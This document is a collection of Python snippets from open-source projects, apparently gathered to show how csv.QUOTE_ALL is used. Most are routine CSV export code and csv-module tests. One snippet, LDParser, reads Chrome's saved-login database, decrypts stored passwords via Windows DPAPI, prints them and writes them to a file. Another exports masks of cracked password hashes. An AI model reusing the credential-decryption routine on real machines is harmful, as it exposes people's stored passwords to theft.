The following 50 code examples, extracted from open-source Python projects, illustrate how to use csv.QUOTE_ALL.
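
Before the project examples, here is a minimal, self-contained sketch (not taken from any of the projects below) contrasting csv.QUOTE_ALL with the default csv.QUOTE_MINIMAL; the io.StringIO buffer is used only so the output can be shown inline:

import csv
import io

# With QUOTE_ALL, every field is wrapped in the quote character;
# with the default QUOTE_MINIMAL, only fields containing the delimiter,
# the quote character, or a newline are quoted.
buf = io.StringIO()
csv.writer(buf, quoting=csv.QUOTE_ALL).writerow(['a', 1, 'p,q'])
print(buf.getvalue(), end='')       # "a","1","p,q"

buf = io.StringIO()
csv.writer(buf, quoting=csv.QUOTE_MINIMAL).writerow(['a', 1, 'p,q'])
print(buf.getvalue(), end='')       # a,1,"p,q"
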
def create_carto_file():
    """Creates a .csv file to be uploaded into http://carto.com with the smells."""
    location_finder = LocationFinder()
    filename = "carto.csv"
    csv_file = open(filename, "w", newline="")
    print("Output file: {}".format(filename))
    map_writer = csv.writer(csv_file, delimiter=",", quoting=csv.QUOTE_ALL)
    map_writer.writerow(["longitude", "latitude", "date", "location_name",
                         "number_of_smells"])
    missing_locations = []
    for borough_name, borough_information in smell_hits.res.items():
        for year, number_of_smells in borough_information.items():
            (latitude, longitude) = location_finder.lookup(borough_name)
            if latitude is not None and longitude is not None:
                date = "{}/01/01".format(year)
                # Keep the column order aligned with the header:
                # longitude first, then latitude.
                map_writer.writerow([longitude, latitude, date,
                                     borough_name, number_of_smells])
            elif borough_name not in missing_locations:
                missing_locations.append(borough_name)
    print("Missing locations:", missing_locations)

def clean_and_write_dataframe_to_csv(data, filename):
    """
    Cleans a dataframe of np.NaNs and saves to file via pandas.to_csv

    :param data: data to write to CSV
    :type data: :class:`pandas.DataFrame`
    :param filename: Path to file to write CSV to. If None, string of data will be returned
    :type filename: str | None
    :return: If the filename is None, returns the string of data. Otherwise returns None.
    :rtype: str | None
    """
    # Replace np.NaN values with None so they serialize cleanly.
    data = data.where((pd.notnull(data)), None)
    # If filename=None, to_csv will return a string.
    result = data.to_csv(path_or_buf=filename, encoding='utf-8', index=False,
                         na_rep=None, quoting=csv.QUOTE_ALL)
    logging.info("Dataframe of shape %s has been stored." % str(data.shape))
    return result

def LDParser(self):
    # NOTE: Python 2 code (print statements, bytes-mode CSV output).
    # Reads Chrome's "Login Data" SQLite database and decrypts the stored
    # passwords via the Windows DPAPI.
    conn = sqlite3.connect(os.getenv("APPDATA") +
                           "\..\Local\Google\Chrome\User Data\Default\Login Data")
    cursor = conn.cursor()
    cursor.execute('SELECT action_url, username_value, password_value FROM logins')
    output_file_path = 'ChromeCode/ChromeLoginData'
    with open(output_file_path, 'wb') as output_file:
        csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
        headers = []
        csv_writer.writerow(headers)
        for result in cursor.fetchall():
            password = win32crypt.CryptUnprotectData(result[2], None, None, None, 0)[1]
            if password:
                print 'Site: ' + result[0]
                print 'Username: ' + result[1]
                print 'Password: ' + password
                Final_list = (('Site', result[0]) +
                              ("\n" 'Username', result[1]) +
                              ("\n" 'Password', password))
                csv_writer.writerow(Final_list)

def HistParser(self):
    # NOTE: Python 2 code. Basic history parser pulling only URLs.
    HistStatement = 'SELECT url FROM urls'
    with sqlite3.connect('C:\Users\Lewis Collins\AppData\Local\Google\Chrome\User Data\Default\History') as conn:
        conn.text_factory = str
        c = conn.cursor()
        output_file_path = 'ChromeCode/Chrome_Hist.csv'
        with open(output_file_path, 'wb') as output_file:
            csv_writer = csv.writer(output_file, quoting=csv.QUOTE_ALL)
            headers = []
            csv_writer.writerow(headers)
            # Chrome history timestamps count from this epoch (unused below).
            epoch = datetime(1601, 1, 1)
            for row in c.execute(HistStatement):
                row = list(row)
                csv_writer.writerow(row)

def _test_arg_valid(self, ctor, arg):
    self.assertRaises(TypeError, ctor)
    # PyPy gets an AttributeError instead of a TypeError
    self.assertRaises((TypeError, AttributeError), ctor, None)
    self.assertRaises(TypeError, ctor, arg, bad_attr=0)
    self.assertRaises(TypeError, ctor, arg, delimiter=0)
    self.assertRaises(TypeError, ctor, arg, delimiter='XX')
    self.assertRaises(csv.Error, ctor, arg, 'foo')
    self.assertRaises(TypeError, ctor, arg, delimiter=None)
    self.assertRaises(TypeError, ctor, arg, delimiter=1)
    self.assertRaises(TypeError, ctor, arg, quotechar=1)
    self.assertRaises(TypeError, ctor, arg, lineterminator=None)
    self.assertRaises(TypeError, ctor, arg, lineterminator=1)
    self.assertRaises(TypeError, ctor, arg, quoting=None)
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar='')
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar=None)

def _test_dialect_attrs(self, ctor, *args):
    # Now try with dialect-derived options
    class dialect:
        delimiter = '-'
        doublequote = False
        escapechar = '^'
        lineterminator = '$'
        quotechar = '#'
        quoting = csv.QUOTE_ALL
        skipinitialspace = True
        strict = False
    args = args + (dialect,)
    obj = ctor(*args)
    self.assertEqual(obj.dialect.delimiter, '-')
    self.assertEqual(obj.dialect.doublequote, False)
    self.assertEqual(obj.dialect.escapechar, '^')
    self.assertEqual(obj.dialect.lineterminator, "$")
    self.assertEqual(obj.dialect.quotechar, '#')
    self.assertEqual(obj.dialect.quoting, csv.QUOTE_ALL)
    self.assertEqual(obj.dialect.skipinitialspace, True)
    self.assertEqual(obj.dialect.strict, False)

def test_quoting(self):
    class mydialect(csv.Dialect):
        delimiter = ";"
        escapechar = '\\'
        doublequote = False
        skipinitialspace = True
        lineterminator = '\r\n'
        quoting = csv.QUOTE_NONE
    d = mydialect()

    mydialect.quoting = None
    self.assertRaises(csv.Error, mydialect)

    mydialect.doublequote = True
    mydialect.quoting = csv.QUOTE_ALL
    mydialect.quotechar = '"'
    d = mydialect()

    mydialect.quotechar = "''"
    self.assertRaises(csv.Error, mydialect)

    mydialect.quotechar = 4
    self.assertRaises(csv.Error, mydialect)

def _test_arg_valid(self, ctor, arg):
    self.assertRaises(TypeError, ctor)
    self.assertRaises(TypeError, ctor, None)
    self.assertRaises(TypeError, ctor, arg, bad_attr=0)
    self.assertRaises(TypeError, ctor, arg, delimiter=0)
    self.assertRaises(TypeError, ctor, arg, delimiter='XX')
    self.assertRaises(csv.Error, ctor, arg, 'foo')
    self.assertRaises(TypeError, ctor, arg, delimiter=None)
    self.assertRaises(TypeError, ctor, arg, delimiter=1)
    self.assertRaises(TypeError, ctor, arg, quotechar=1)
    self.assertRaises(TypeError, ctor, arg, lineterminator=None)
    self.assertRaises(TypeError, ctor, arg, lineterminator=1)
    self.assertRaises(TypeError, ctor, arg, quoting=None)
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar='')
    self.assertRaises(TypeError, ctor, arg,
                      quoting=csv.QUOTE_ALL, quotechar=None)

def rm_source(identnr):
    """Removes the source with the given identnr.

    :param identnr: identifier of the source to remove
    """
    source = get_sources(ident=str(identnr))
    if source:
        source_name = source[0][1]
    else:
        return False
    path = CACHE_DIR + str(identnr) + "_" + source_name.replace(".", "") + '.json'
    all_sources = _get_all_sources_as_list()
    new = [x for x in all_sources if x[0] != identnr]
    with open(SOURCE_FLE_NAME, 'w+') as csvfile:
        sourcewriter = csv.writer(csvfile, delimiter=DELIMITER,
                                  quoting=csv.QUOTE_ALL)
        for row in new:
            sourcewriter.writerow(row)
    # os.remove returns None, so success is signalled by not raising.
    os.remove(path)
    return True

def expand(self, db_schema, inc_tags=False, exc_tags=False, out_pth=_TEMPLATE_PTH):
    self.db_schema = db_schema
    self.inc_tags, self.exc_tags = inc_tags, exc_tags
    assert not (inc_tags and exc_tags), "cannot have included and excluded tags"
    with open(out_pth, 'w') as out_hndl:
        self.out_hndl = out_hndl
        self.csv_writer = csv.DictWriter(
            out_hndl,
            fieldnames=[x.value for x in consts.OUTPUT_COLS],
            extrasaction='ignore',
            quoting=csv.QUOTE_ALL,
        )
        self.csv_writer.writeheader()
        for f in self.db_schema:
            self.expand_form(f)

def csv_masks(request, hashfile_id):
    hashfile = get_object_or_404(Hashfile, id=hashfile_id)

    # Didn't find the proper way to do this in pure Django...
    res = Cracked.objects.raw(
        "SELECT id, password_mask, COUNT(*) AS count FROM Hashcat_cracked "
        "USE INDEX (hashfileid_id_index) WHERE hashfile_id=%s "
        "GROUP BY password_mask ORDER BY count DESC", [hashfile.id])

    fp = tempfile.SpooledTemporaryFile(mode='w')
    csvfile = csv.writer(fp, quotechar='"', quoting=csv.QUOTE_ALL)
    for item in res:
        csvfile.writerow([item.count, item.password_mask])
    fp.seek(0)  # rewind the file handle
    csvfile_data = fp.read()

    for query in connection.queries[-1:]:
        print(query["sql"])
        print(query["time"])

    # content_type replaces mimetype as of Django 1.7.
    response = HttpResponse(csvfile_data, content_type='application/force-download')
    response['Content-Disposition'] = 'attachment; filename=%s_masks.csv' % hashfile.name
    return response

def write_stock(stock_out, filtered_stock, modifications):
    """
    Generate the new stock file with modified and created entries.

    We mimic the initial stock file's encoding, quoting and delimiters.
    """
    with open(stock_out, 'w', encoding='cp1252') as csv_file:
        _, first_row, fieldnames = next(filtered_stock)
        # `extrasaction` is set to `ignore` to be able to pass more keys
        # to the `writerow` method coming from the flux.
        writer = csv.DictWriter(
            csv_file, fieldnames=fieldnames, delimiter=';',
            quoting=csv.QUOTE_ALL, extrasaction='ignore')
        writer.writeheader()
        # Because we already iterated once to retrieve fieldnames.
        writer.writerow(first_row)
        # Then write the updated stock.
        for i, row, _ in filtered_stock:
            writer.writerow(row)
        # Finally, append creations and insertions.
        for siret, row in modifications.items():
            is_created = row['VMAJ'] == 'C'
            is_inserted = row['VMAJ'] == 'D'
            if is_created or is_inserted:
                writer.writerow(row)

def write_stock(stock_out, filtered_stock):
    """
    Generate the new stock file with filtered entries.

    We mimic the initial stock file's encoding, quoting and delimiters.
    """
    with open(stock_out, 'w', encoding='cp1252') as csv_file:
        _, first_row, fieldnames = next(filtered_stock)
        # `extrasaction` is set to `ignore` to be able to pass more keys
        # to the `writerow` method coming from the flux.
        writer = csv.DictWriter(
            csv_file, fieldnames=fieldnames, delimiter=';',
            quoting=csv.QUOTE_ALL, extrasaction='ignore')
        writer.writeheader()
        # Because we already iterated once to retrieve fieldnames.
        writer.writerow(first_row)
        # Then write the updated stock.
        for i, row, _ in filtered_stock:
            writer.writerow(row)

def run_rules(job_id, schema_name):
    # NOTE: Python 2 code (reader.next(), print statements).
    meta_conn = psycopg2.connect("dbname='validator' user='testUser' "
                                 "host='localhost' password='testPwd'")
    meta_conn.set_isolation_level(ISOLATION_LEVEL_AUTOCOMMIT)
    meta_c = meta_conn.cursor()
    meta_c.execute('UPDATE jobs SET status=\'starting_rules\' WHERE job_id=%d' % job_id)

    conn = psycopg2.connect("dbname='job_%d' user='testUser' "
                            "host='localhost' password='testPwd'" % job_id)
    c = conn.cursor()

    reader = csv.reader(open('rules/%s.csv' % schema_name, 'rb'),
                        quotechar='"', delimiter=',',
                        quoting=csv.QUOTE_ALL, skipinitialspace=True)
    header = reader.next()
    for row in reader:
        sql = row[header.index('sql')]
        print "Running rule %s: %s" % (row[header.index('id')], sql)
        c.execute(sql)
        invalid_count = 0
        for row in c.fetchall():
            invalid_count += 1
        print '==> Found %d invalid rows.' % invalid_count
    conn.close()

    meta_c.execute("UPDATE jobs SET status='finished_rules' WHERE job_id=%d" % job_id)
    meta_conn.close()

def score_packets(input_url='data/raw_packets.csv', output_url='data/scored_packets.csv'):
    '''Adds score indicators to botnets'''
    print("Transforming initial data csv")
    with open(output_url, 'w') as raw_flows:
        writer = csv.writer(raw_flows, delimiter=',', quotechar='"',
                            quoting=csv.QUOTE_ALL)
        with open(input_url) as csvfile:
            # `headers` is a list, so the extra column must be appended as a list.
            writer.writerow(headers + ["Score"])
            first = True
            for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
                if first:
                    first = False
                    continue
                if row[headers.index('Label')] == "BENIGN":
                    row.append(0)
                else:
                    row.append(1)
                writer.writerow(row)

def modify_csv_rows(input_url=PROJ_ROOT + 'data/data.csv',
                    output_url=PROJ_ROOT + 'data/modified_data.csv'):
    print("Transforming initial data csv")
    with open(output_url, 'w') as new:
        newWriter = csv.writer(new, delimiter=',', quotechar='"',
                               quoting=csv.QUOTE_ALL)
        with open(input_url) as csvfile:
            newWriter.writerow(['Source Port', 'Destination Port', 'Eth', 'Source',
                                'Destination', 'Protocol', 'IP_Flags', 'Length',
                                'Protocols in frame', 'Time', 'tcp_Flags',
                                'TCP Segment Len', 'udp_Length'])
            first = True
            for row in csv.reader(csvfile, delimiter=',', quotechar='"'):
                if first:
                    first = False
                    continue
                if row[2]:
                    row.pop(0)
                    row.pop(0)
                else:
                    row.pop(2)
                    row.pop(2)
                newWriter.writerow(row)
    print("Csv row modification complete\n##############################")

def test_csv_export(rf, module):
    class CSVExport(views.AbstractCSVExportView):
        def get_filename(self):
            return 'testexport.csv'

        def get_header(self):
            return ['head1', 'head2']

        def export_rows(self):
            return [['regular', 'delimiter,;\t '],
                    ['escaping"\'', 'newlines\r\n']]

    request = rf.get('/')
    response = CSVExport.as_view()(request, module=module)
    assert response['Content-Disposition'] == ('attachment; '
                                               'filename="testexport.csv"')

    reader = csv.reader(response.content.decode('utf-8').splitlines(True),
                        lineterminator='\n', quotechar='"',
                        quoting=csv.QUOTE_ALL)
    lines = list(reader)
    assert lines[0] == ['head1', 'head2']
    assert lines[1] == ['regular', 'delimiter,;\t ']
    assert lines[2] == ['escaping"\'', 'newlines\r\n']

def main():
    parser = make_arg_parser()
    args = parser.parse_args()
    sam_files = [os.path.join(args.input, filename)
                 for filename in os.listdir(args.input)
                 if filename.endswith('.sam')]
    img_map = IMGMap()
    ncbi_tree = NCBITree()
    with open(args.output, 'w') if args.output else sys.stdout as outf:
        csv_outf = csv.writer(outf, quoting=csv.QUOTE_ALL, lineterminator='\n')
        csv_outf.writerow(['sample_id', 'sequence_id', 'ncbi_tid', 'img_id'])
        for file in sam_files:
            with open(file) as inf:
                lca_map = build_lca_map(yield_alignments_from_sam_inf(inf),
                                        ncbi_tree, img_map)
                for key in lca_map:
                    img_ids, ncbi_tid = lca_map[key]
                    csv_outf.writerow([os.path.basename(file)[:-4], key,
                                       ncbi_tid, ','.join(img_ids)])

def get(self):
    cached = memcache.get('best_handler')
    if cached:
        self.response.out.write(cached)
    else:
        response_writer = csv.writer(
            self.response, delimiter=',', quoting=csv.QUOTE_ALL)
        # Instruct endpoint to cache for 1 day.
        self.response.headers['Cache-control'] = 'public, max-age=86400'
        for line in ndb.gql(
                'select distinct screen_name, twitter_id, score '
                'from Score order by score limit 20000'):
            response_writer.writerow(
                [line.screen_name, line.twitter_id, line.score])
        memcache.set('best_handler', self.response.text, 86400)

def get(self):
    cached = memcache.get('worst_handler')
    if cached:
        self.response.out.write(cached)
    else:
        response_writer = csv.writer(
            self.response, delimiter=',', quoting=csv.QUOTE_ALL)
        # Instruct endpoint to cache for 1 day.
        self.response.headers['Cache-control'] = 'public, max-age=86400'
        # Using GQL as a test - will create new index
        for line in ndb.gql(
                'select distinct screen_name, twitter_id, score '
                'from Score order by score desc limit 20000'):
            response_writer.writerow(
                [line.screen_name, line.twitter_id, line.score])
        memcache.set('worst_handler', self.response.text, 86400)

def get(self):
    cached = memcache.get('worst_hashtags')
    if cached:
        self.response.out.write(cached)
    else:
        response_writer = csv.writer(
            self.response, delimiter=',', quoting=csv.QUOTE_ALL)
        # Instruct endpoint to cache for 1 day.
        self.response.headers['Cache-control'] = 'public, max-age=86400'
        c = Counter()
        for s in Score.query().order(-Score.score).iter(
                limit=5000, projection=(Score.hashtags)):
            if s.hashtags is not None:
                c.update(h.lower() for h in s.hashtags)
        for tag, tag_count in c.most_common(100):
            response_writer.writerow([tag, tag_count])
        memcache.set('worst_hashtags', self.response.text, 86400)

def get(self):
    cached = memcache.get('worst_websitess')
    if cached:
        self.response.out.write(cached)
    else:
        response_writer = csv.writer(
            self.response, delimiter=',', quoting=csv.QUOTE_ALL)
        # Instruct endpoint to cache for 1 day.
        self.response.headers['Cache-control'] = 'public, max-age=86400'
        c = Counter()
        for s in Score.query().order(-Score.score).iter(
                limit=5000, projection=(Score.websites)):
            if s.websites is not None:
                c.update(h.lower() for h in s.websites)
        for site, site_count in c.most_common(200):
            response_writer.writerow([site, site_count])
        memcache.set('worst_websitess', self.response.text, 86400)

def get(self):
    cached = memcache.get('worst_unknown_websites')
    if cached:
        self.response.out.write(cached)
    else:
        response_writer = csv.writer(
            self.response, delimiter=',', quoting=csv.QUOTE_ALL)
        # Instruct endpoint to cache for 1 day.
        self.response.headers['Cache-control'] = 'public, max-age=86400'
        c = Counter()
        for s in Score.query().order(-Score.score).iter(
                limit=5000, projection=(Score.websites)):
            if s.websites is not None:
                # KNOWN_SITES: assumed to be a collection of known domains
                # defined elsewhere in the original project.
                c.update(h.lower() for h in s.websites
                         if h.lower() not in KNOWN_SITES)
        for site, site_count in c.most_common(200):
            response_writer.writerow([site, site_count])
        memcache.set('worst_unknown_websites', self.response.text, 86400)

def read_table(zip_file, table_name, columns, dtypes=None):
    if not dtypes:
        dtypes = {}
    with zip_file.open(table_name + '.txt', 'r') as csv_stream:
        header = csv_stream.readline().strip()
        names = [GET_COLUMN_NAME_REGEX.sub(b'', name).decode('ascii')
                 for name in header.split(b',')]
        table = pandas.read_csv(
            csv_stream, names=names, quotechar='"',
            quoting=csv.QUOTE_ALL,
            usecols=[col for col in columns])
        table = [numpy.asarray(remove_nans(table[column]),
                               dtype=dtypes.get(column))
                 for column in columns]
    return table

def gen_csv(csvfile, page_list):
    # Define writer
    writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
    # Field names
    field_names = ['PageID', 'DescriptionURL', 'ImageURL', 'ImageSHA1',
                   'PixelHeight', 'PixelWidth', 'PaintingID', 'Artist',
                   'RealDimensions']
    writer.writerow(field_names)
    # For each image
    for page in page_list:
        writer.writerow([page.page_id, page.description_url, page.img_url,
                         page.img_sha1, page.img_height, page.img_width,
                         page.paint_id, page.artist, page.dim])

def get_csv_writer_fmtparams(self):
    return {
        'dialect': 'excel',
        'quoting': csv.QUOTE_ALL,
    }

def write_dict_to_csv(list_of_dictionaries, output_file):
    """Write a list of dictionaries to a csv file."""
    fieldnames = ['centroid_lon', 'centroid_lat', 'feature_type', 'name', 'source']
    with open(output_file, 'w', newline='') as f:
        w = csv.DictWriter(f, fieldnames, quoting=csv.QUOTE_ALL)
        w.writeheader()
        w.writerows(list_of_dictionaries)

def write_to_csv(received_data=[], *args):
    first_data = ["Company", "Last Traded Price", "Change", "Total Listed Shares",
                  "Paid Up Value", "Total Paid Up Value", "Closing Market Price",
                  "Market Capitalization"]
    if os.path.isfile("datafile.csv"):
        with open("datafile.csv", "a") as output:
            writer = csv.writer(output, quoting=csv.QUOTE_ALL)
            writer.writerow(received_data)
            received_data[:] = []
    else:
        with open("datafile.csv", "w") as output:
            writer = csv.writer(output, quoting=csv.QUOTE_ALL)
            writer.writerow(first_data)
            writer.writerow(received_data)
            received_data[:] = []

def module_run(self):
    filename = self.options['filename']
    # codecs module not used because the csv module converts to ascii
    with open(filename, 'w') as outfile:
        # build a list of table names
        table = self.options['table']
        rows = self.query('SELECT * FROM "%s" ORDER BY 1' % (table))
        cnt = 0
        for row in rows:
            row = [x if x else '' for x in row]
            if any(row):
                cnt += 1
                csvwriter = csv.writer(outfile, quoting=csv.QUOTE_ALL)
                csvwriter.writerow([s.encode("utf-8") for s in row])
    self.output('%d records added to \'%s\'.' % (cnt, filename))

def write_csv_file(filename, result, path):
    """Writes the result to csv with the given filename.

    Args:
        filename (str): Filename to write to.
        result (iterable): Values to write, one per row.
        path (str): Directory path to use.
    """
    output = open(path + filename + '.csv', 'wb')
    writer = csv.writer(output, quoting=csv.QUOTE_ALL, lineterminator='\n')
    for val in result:
        writer.writerow([val])
    # Alternative: everything on a single row
    # writer.writerow(result)

def execute(self, statement):
    execution_id = self.athena.start_query_execution(self.dbname, statement)
    if not execution_id:
        return

    while True:
        stats = self.athena.get_query_execution(execution_id)
        status = stats['QueryExecution']['Status']['State']
        if status in ['SUCCEEDED', 'FAILED', 'CANCELLED']:
            break
        time.sleep(0.2)  # 200ms

    if status == 'SUCCEEDED':
        results = self.athena.get_query_results(execution_id)
        headers = [h['Name'].encode("utf-8")
                   for h in results['ResultSet']['ResultSetMetadata']['ColumnInfo']]
        if self.format in ['CSV', 'CSV_HEADER']:
            csv_writer = csv.writer(sys.stdout, quoting=csv.QUOTE_ALL)
            if self.format == 'CSV_HEADER':
                csv_writer.writerow(headers)
            csv_writer.writerows([[text.encode("utf-8") for text in row]
                                  for row in self.athena.yield_rows(results, headers)])
        elif self.format == 'TSV':
            print(tabulate([row for row in self.athena.yield_rows(results, headers)],
                           tablefmt='tsv'))
        elif self.format == 'TSV_HEADER':
            print(tabulate([row for row in self.athena.yield_rows(results, headers)],
                           headers=headers, tablefmt='tsv'))
        elif self.format == 'VERTICAL':
            for num, row in enumerate(self.athena.yield_rows(results, headers)):
                print('--[RECORD {}]--'.format(num + 1))
                print(tabulate(zip(*[headers, row]), tablefmt='presto'))
        else:  # ALIGNED
            print(tabulate([x for x in self.athena.yield_rows(results, headers)],
                           headers=headers, tablefmt='presto'))

    if status == 'FAILED':
        print(stats['QueryExecution']['Status']['StateChangeReason'])

def Y_Output():
    mylist = [1,1,0,0,1,1,1,1,0,1,1,0,1,1,1,0,0,1,0,0,1,1,1,1,0]
    myfile = open("sandeep_Y.csv", 'wb')
    wr = csv.writer(myfile, quoting=csv.QUOTE_ALL)
    wr.writerow(mylist)
    with open('prakhar_Y.csv', 'rb') as csvfile:
        spamreader = csv.reader(csvfile)
        for row in spamreader:
            print row

def test_write_quoting(self):
    self._write_test(['a', 1, 'p,q'], 'a,1,"p,q"')
    self.assertRaises(csv.Error, self._write_test,
                      ['a', 1, 'p,q'], 'a,1,p,q',
                      quoting=csv.QUOTE_NONE)
    self._write_test(['a', 1, 'p,q'], 'a,1,"p,q"',
                     quoting=csv.QUOTE_MINIMAL)
    self._write_test(['a', 1, 'p,q'], '"a",1,"p,q"',
                     quoting=csv.QUOTE_NONNUMERIC)
    self._write_test(['a', 1, 'p,q'], '"a","1","p,q"',
                     quoting=csv.QUOTE_ALL)
    self._write_test(['a\nb', 1], '"a\nb","1"',
                     quoting=csv.QUOTE_ALL)

def test_write_quoting(self):
    self._write_test(['a', 1, 'p,q'], 'a,1,"p,q"')
    self._write_error_test(csv.Error, ['a', 1, 'p,q'],
                           quoting=csv.QUOTE_NONE)
    self._write_test(['a', 1, 'p,q'], 'a,1,"p,q"',
                     quoting=csv.QUOTE_MINIMAL)
    self._write_test(['a', 1, 'p,q'], '"a",1,"p,q"',
                     quoting=csv.QUOTE_NONNUMERIC)
    self._write_test(['a', 1, 'p,q'], '"a","1","p,q"',
                     quoting=csv.QUOTE_ALL)
    self._write_test(['a\nb', 1], '"a\nb","1"',
                     quoting=csv.QUOTE_ALL)

def test_quoting(self):
    class mydialect(csv.Dialect):
        delimiter = ";"
        escapechar = '\\'
        doublequote = False
        skipinitialspace = True
        lineterminator = '\r\n'
        quoting = csv.QUOTE_NONE
    d = mydialect()
    self.assertEqual(d.quoting, csv.QUOTE_NONE)

    mydialect.quoting = None
    self.assertRaises(csv.Error, mydialect)

    mydialect.doublequote = True
    mydialect.quoting = csv.QUOTE_ALL
    mydialect.quotechar = '"'
    d = mydialect()
    self.assertEqual(d.quoting, csv.QUOTE_ALL)
    self.assertEqual(d.quotechar, '"')
    self.assertTrue(d.doublequote)

    mydialect.quotechar = "''"
    with self.assertRaises(csv.Error) as cm:
        mydialect()
    self.assertEqual(str(cm.exception),
                     '"quotechar" must be an 1-character string')

    mydialect.quotechar = 4
    with self.assertRaises(csv.Error) as cm:
        mydialect()
    self.assertEqual(str(cm.exception),
                     '"quotechar" must be string, not int')

def __create_stocklist(self):
    """Create the stock-list CSV files used by the tests.

    Returns:
        A list of the generated ticker symbols.
    """
    def get_row(idx):
        """Build one CSV row of dummy stock data."""
        return ('TEST{}'.format(idx),
                'Test {}'.format(idx),
                'Sector {}'.format(idx % 10),)

    header = ('Symbol', 'Name', 'Sector',)
    num_markets = len(const.MARKET_DATA.keys())
    lis = [[get_row(idx2)
            for idx2, row in enumerate(range(self.num_stocks))
            if idx2 % num_markets == idx1]
           for idx1 in range(len(const.MARKET_DATA.keys()))]
    for idx, (market_id, market_name) in enumerate(const.MARKET_DATA.items()):
        with open(os.path.join(self.dest_dir_stocklist, market_name + '.csv'),
                  'w', encoding=const.DEFAULT_FILE_ENCODING, newline='') as fp:
            writer = csv.writer(fp, quoting=csv.QUOTE_ALL)
            writer.writerow(header)
            writer.writerows(lis[idx])
    return [row[0] for row in chain(*lis)]  # Flatten and keep only the symbols